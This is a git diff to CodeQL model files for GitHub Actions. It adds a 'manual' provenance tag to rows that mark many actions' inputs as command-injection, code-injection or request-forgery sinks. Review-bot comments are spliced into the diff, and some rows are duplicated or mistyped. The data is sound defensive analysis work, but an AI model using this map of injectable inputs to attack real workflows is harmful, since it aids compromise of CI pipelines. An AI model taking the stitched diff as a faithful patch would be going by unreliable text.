diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
index f46c40a8f9cb..2ea1fdf68556 100644
--- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
+++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
@@ -3,10 +3,10 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint"]
+ - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection"]
- - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection"]
+ - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"]
+ - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml
index 219de80c39e2..21e0d819db74 100644
--- a/ql/lib/ext/nanasess_setup-chromedriver.model.yml
+++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection"]
+ - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml
index dc3c2739e87f..bcc8ce6b80db 100644
--- a/ql/lib/ext/nanasess_setup-php.model.yml
+++ b/ql/lib/ext/nanasess_setup-php.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["nanasess/setup-php", "*", "input.php-version", "command-injection"]
+ - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml
index 30679750f131..741ab37eb9b6 100644
--- a/ql/lib/ext/nick-fields_retry.model.yml
+++ b/ql/lib/ext/nick-fields_retry.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection"]
- - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection"]
- - ["nick-fields/retry", "*", "input.command", "command-injection"]
+ - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"]
+ - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection", "manual"]
+ - ["nick-fields/retry", "*", "input.command", "command-injection", "manual"]
diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml
index c600e7a93b64..a9d6b80a627f 100644
--- a/ql/lib/ext/octokit_graphql-action.model.yml
+++ b/ql/lib/ext/octokit_graphql-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["octokit/graphql-action", "*", "input.query", "request-forgery"]
+ - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"]
diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml
index ed9088c9f568..73d4df99af28 100644
--- a/ql/lib/ext/octokit_request-action.model.yml
+++ b/ql/lib/ext/octokit_request-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["octokit/request-action", "*", "input.route", "request-forgery"]
+ - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"]
diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml
index 988c3d5e674f..fb6ae5102e1b 100644
--- a/ql/lib/ext/olafurpg_setup-scala.model.yml
+++ b/ql/lib/ext/olafurpg_setup-scala.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection"]
+ - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml
index 91a3382348ca..8b29e5c99881 100644
--- a/ql/lib/ext/paambaati_codeclimate-action.model.yml
+++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection"]
+ - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"]
diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml
index d9d15dc94b27..5a5cedcaca5f 100644
--- a/ql/lib/ext/peter-evans_create-pull-request.model.yml
+++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection"]
+ - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"]
diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml
index 6bc0467692d2..12d3f23f8fdf 100644
--- a/ql/lib/ext/plasmicapp_plasmic-action.model.yml
+++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml
@@ -3,6 +3,6 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection"]
- - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection"]
- - ["plasmicapp/plasmic-action", "*", "input.branch", "command-injection"]
+ - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"]
+ - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection", "manual"]
+ - ["plasmicapp/plasmic-action", "*", "input.branch", "command-injection", "manual"]
diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml
index 62dea47d8184..30be564c42a4 100644
--- a/ql/lib/ext/preactjs_compressed-size-action.model.yml
+++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection"]
- - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection"]
+ - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"]
+ - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection", "manual"]
diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml
index 525d0199859d..13d4cfeb814d 100644
--- a/ql/lib/ext/py-actions_flake8.model.yml
+++ b/ql/lib/ext/py-actions_flake8.model.yml
@@ -3,10 +3,10 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["py-actions/flake8", "*", "input.flake8-version", "command-injection"]
- - ["py-actions/flake8", "*", "input.plugins", "command-injection"]
- - ["py-actions/flake8", "*", "input.path", "command-injection"]
- - ["py-actions/flake8", "*", "input.ignore", "command-injection"]
- - ["py-actions/flake8", "*", "input.exclude", "command-injection"]
- - ["py-actions/flake8", "*", "input.max-line-length", "command-injection"]
- - ["py-actions/flake8", "*", "input.args", "command-injection"]
+ - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"]
+ - ["py-actions/flake8", "*", "input.plugins", "command-injection", "manual"]
+ - ["py-actions/flake8", "*", "input.path", "command-injection", "manual"]
+ - ["py-actions/flake8", "*", "input.ignore", "command-injection", "manual"]
+ - ["py-actions/flake8", "*", "input.exclude", "command-injection", "manual"]
+ - ["py-actions/flake8", "*", "input.max-line-length", "command-injection", "manual"]
+ - ["py-actions/flake8", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml
index 5aac0f894327..3043c9b30ec2 100644
--- a/ql/lib/ext/py-actions_py-dependency-install.model.yml
+++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["py-actions/py-dependency-install", "*", "input.path", "command-injection"]
+ - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"]
diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml
index d32c6509ad7e..29d51d1bfbba 100644
--- a/ql/lib/ext/pyo3_maturin-action.model.yml
+++ b/ql/lib/ext/pyo3_maturin-action.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection"]
- - ["pyo3/maturin-action", "*", "input.target", "command-injection"]
- - ["pyo3/maturin-action", "*", "input.command", "command-injection"]
- - ["pyo3/maturin-action", "*", "input.manylinux", "command-injection"]
+ - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"]
+ - ["pyo3/maturin-action", "*", "input.target", "command-injection", "manual"]
+ - ["pyo3/maturin-action", "*", "input.command", "command-injection", "manual"]
+ - ["pyo3/maturin-action", "*", "input.manylinux", "command-injection", "manual"]
diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml
index c4ea326ecef0..75a9650a92fb 100644
--- a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml
+++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml
@@ -3,22 +3,22 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection"]
- - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection"]
- - ["reactivecircus/android-emulator-runner", "*", "input.arch", "command-injection"]
- - ["reactivecircus/android-emulator-runner", "*", "input.profile", "command-injection"]
- - ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size'", "command-injection"]
- - ["reactivecircus/android-emulator-runner", "*", "input.cores", "command-injection"]
- - ["reactivecircus/android-emulator-runner", "*", "input.ram-size", "command-injection"]
- - ["reactivecircus/android-emulator-runner", "*", "input.heap-size", "command-injection"]
- - ["reactivecircus/android-emulator-runner", "*", "input.disk-size", "command-injection"]
- - ["reactivecircus/android-emulator-runner", "*", "input.emulator-options", "command-injection"]
- - ["reactivecircus/android-emulator-runner", "*", "input.emulator-build", "command-injection"]
- - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
- - ["reactivecircus/android-emulator-runner", "*", "input.cmake", "command-injection"]
- - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
- - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
- - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
- - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
- - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
- - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection", 
"manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.arch", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.profile", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size'", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.cores", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ram-size", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.heap-size", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.disk-size", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.emulator-options", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.emulator-build", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.cmake", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"]
+ - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"]
diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml
index 52c478dd1d4d..9b0ec011fd62 100644
--- a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml
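Review bot: The new side still carries the stray apostrophe in `input.sdcard-path-or-size'`, so that sink row can never match the action's real `sdcard-path-or-size` input and the commit only appends a provenance column to a row that was already dead; the same stray quote is carried forward in the tripss/conventional-changelog-action hunk as `input.tag-prefix'`. This hunk also repeats `input.ndk` seven times; the duplicates add nothing and look like placeholder rows whose intended input names were never filled in, though I cannot confirm the missing names from the diff. I would correct the row to `- ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size", "command-injection", "manual"]` and either replace the extra `input.ndk` rows with the inputs they were meant to model or drop them.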
+++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "Downloaded artifact"]
+ - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "Downloaded artifact", "manual"]
diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml
index 7213a39f992b..a0c4d6f7ec50 100644
--- a/ql/lib/ext/reggionick_s3-deploy.model.yml
+++ b/ql/lib/ext/reggionick_s3-deploy.model.yml
@@ -3,11 +3,11 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection"]
- - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection"]
- - ["reggionick/s3-deploy", "*", "input.dist-id", "command-injection"]
- - ["reggionick/s3-deploy", "*", "input.invalidation", "command-injection"]
- - ["reggionick/s3-deploy", "*", "input.delete-removed", "command-injection"]
- - ["reggionick/s3-deploy", "*", "input.cacheControl", "command-injection"]
- - ["reggionick/s3-deploy", "*", "input.cache", "command-injection"]
- - ["reggionick/s3-deploy", "*", "input.files-to-include", "command-injection"]
+ - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.dist-id", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.invalidation", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.delete-removed", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.cacheControl", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.cache", "command-injection", "manual"]
+ - ["reggionick/s3-deploy", "*", "input.files-to-include", "command-injection", "manual"]
diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml
index 3207c6d75211..b5d4629003b7 100644
--- a/ql/lib/ext/renovatebot_github-action.model.yml
+++ b/ql/lib/ext/renovatebot_github-action.model.yml
@@ -3,8 +3,8 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection"]
- - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection"]
- - ["renovatebot/github-action", "*", "input.docker-cmd-file", "command-injection"]
- - ["renovatebot/github-action", "*", "input.docker-user", "command-injection"]
- - ["renovatebot/github-action", "*", "input.docker-volumes", "command-injection"]
+ - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"]
+ - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection", "manual"]
+ - ["renovatebot/github-action", "*", "input.docker-cmd-file", "command-injection", "manual"]
+ - ["renovatebot/github-action", "*", "input.docker-user", "command-injection", "manual"]
+ - ["renovatebot/github-action", "*", "input.docker-volumes", "command-injection", "manual"]
diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml
index d00d78bcba8a..4b96edeccc2f 100644
--- a/ql/lib/ext/roots_issue-closer-action.model.yml
+++ b/ql/lib/ext/roots_issue-closer-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection"]
- - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection"]
+ - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"]
+ - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection", "manual"]
diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml
index e2813105bdc9..ae3ef2e2b1b7 100644
--- a/ql/lib/ext/ros-tooling_setup-ros.model.yml
+++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection"]
+ - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"]
diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml
index d6ba27a50798..079dfc1fc02b 100644
--- a/ql/lib/ext/ruby_setup-ruby.model.yml
+++ b/ql/lib/ext/ruby_setup-ruby.model.yml
@@ -3,9 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint"]
+ - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection"]
+ - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml
index 413f4f3058bc..19edd617c670 100644
--- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml
+++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml
@@ -3,9 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint"]
+ - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection"]
+ - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"]
diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml
index a8db7e8313e6..9f8d987c0aff 100644
--- a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml
+++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint"]
+ - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"]
diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml
index d171499049aa..90a181038680 100644
--- a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml
+++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint"]
+ - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"]
diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml
index 42361b203e08..fd484074f5c5 100644
--- a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml
+++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection"]
\ No newline at end of file
+ - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml
index 474b36186b09..5caaea9562e1 100644
--- a/ql/lib/ext/snow-actions_eclint.model.yml
+++ b/ql/lib/ext/snow-actions_eclint.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["snow-actions/eclint", "*", "input.args", "command-injection"]
+ - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml
index 73b93dbb88af..9462b8d5bbd1 100644
--- a/ql/lib/ext/stackhawk_hawkscan-action.model.yml
+++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml
@@ -3,8 +3,8 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection"]
- - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection"]
- - ["stackhawk/hawkscan-action", "*", "input.command", "command-injection"]
- - ["stackhawk/hawkscan-action", "*", "input.args", "command-injection"]
- - ["stackhawk/hawkscan-action", "*", "input.version", "command-injection"]
\ No newline at end of file
+ - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"]
+ - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection", "manual"]
+ - ["stackhawk/hawkscan-action", "*", "input.command", "command-injection", "manual"]
+ - ["stackhawk/hawkscan-action", "*", "input.args", "command-injection", "manual"]
+ - ["stackhawk/hawkscan-action", "*", "input.version", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml
index 4138b97f0fb2..9b01987e1f28 100644
--- a/ql/lib/ext/step-security_harden-runner.model.yml
+++ b/ql/lib/ext/step-security_harden-runner.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection"]
+ - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"]
diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml
index 4ab448b04c1a..10a3630ea0bd 100644
--- a/ql/lib/ext/suisei-cn_actions-download-file.model.yml
+++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint"]
+ - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"]
diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml
index 1bcbac476a80..aac20afddf56 100644
--- a/ql/lib/ext/tibdex_backport.model.yml
+++ b/ql/lib/ext/tibdex_backport.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["tibdex/backport", "*", "input.body_template", "code-injection"]
- - ["tibdex/backport", "*", "input.head_template", "code-injection"]
- - ["tibdex/backport", "*", "input.labels_template", "code-injection"]
- - ["tibdex/backport", "*", "input.title_template", "code-injection"]
\ No newline at end of file
+ - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"]
+ - ["tibdex/backport", "*", "input.head_template", "code-injection", "manual"]
+ - ["tibdex/backport", "*", "input.labels_template", "code-injection", "manual"]
+ - ["tibdex/backport", "*", "input.title_template", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml
index 299c387c81a8..8dcabd1650a6 100644
--- a/ql/lib/ext/timheuer_base64-to-file.model.yml
+++ b/ql/lib/ext/timheuer_base64-to-file.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: summaryModel
 data:
- - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint"]
- - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint"]
+ - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"]
+ - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint", "manual"]
diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml
index a7afc090a91f..753303b0cb3d 100644
--- a/ql/lib/ext/tj-actions_branch-names.model.yml
+++ b/ql/lib/ext/tj-actions_branch-names.model.yml
@@ -4,7 +4,7 @@ extensions:
 extensible: sourceModel
 data:
 # https://github.com/tj-actions/branch-names
- - ["tj-actions/branch-names", "*", "output.current_branch", "PR current branch"]
- - ["tj-actions/branch-names", "*", "output.head_ref_branch", "PR head branch"]
- - ["tj-actions/branch-names", "*", "output.ref_branch", "Branch tirggering workflow run"]
+ - ["tj-actions/branch-names", "*", "output.current_branch", "PR current branch", "manual"]
+ - ["tj-actions/branch-names", "*", "output.head_ref_branch", "PR head branch", "manual"]
+ - ["tj-actions/branch-names", "*", "output.ref_branch", "Branch tirggering workflow run", "manual"]
diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml
index 7890668fa878..fb15abce061d 100644
--- a/ql/lib/ext/tj-actions_changed-files.model.yml
+++ b/ql/lib/ext/tj-actions_changed-files.model.yml
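Review bot: The rewritten `output.ref_branch` row keeps the typo in its description column, `Branch tirggering workflow run`, and that string is what the source model surfaces to whoever reads a result. Since the row is being touched anyway, it should read `- ["tj-actions/branch-names", "*", "output.ref_branch", "Branch triggering workflow run", "manual"]`.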
@@ -3,20 +3,20 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["tj-actions/changed-files", "*", "output.added_files", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.copied_files", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.deleted_files", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.modified_files", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.renamed_files", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.type_changed_files", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.unmerged_files", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.unknown_files", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.all_changed_files", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.other_changed_files", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.all_modified_files", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.other_modified_files", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.other_deleted_files", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.modified_keys", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.changed_keys", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.added_files", "PR changed files", "manual"]
+ - ["tj-actions/changed-files", "*", "output.copied_files", "PR changed files", "manual"]
+ - ["tj-actions/changed-files", "*", "output.deleted_files", "PR changed files", "manual"]
+ - ["tj-actions/changed-files", "*", "output.modified_files", "PR changed files", "manual"]
+ - ["tj-actions/changed-files", "*", "output.renamed_files", "PR changed files", 
"manual"]
+ - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "PR changed files", "manual"]
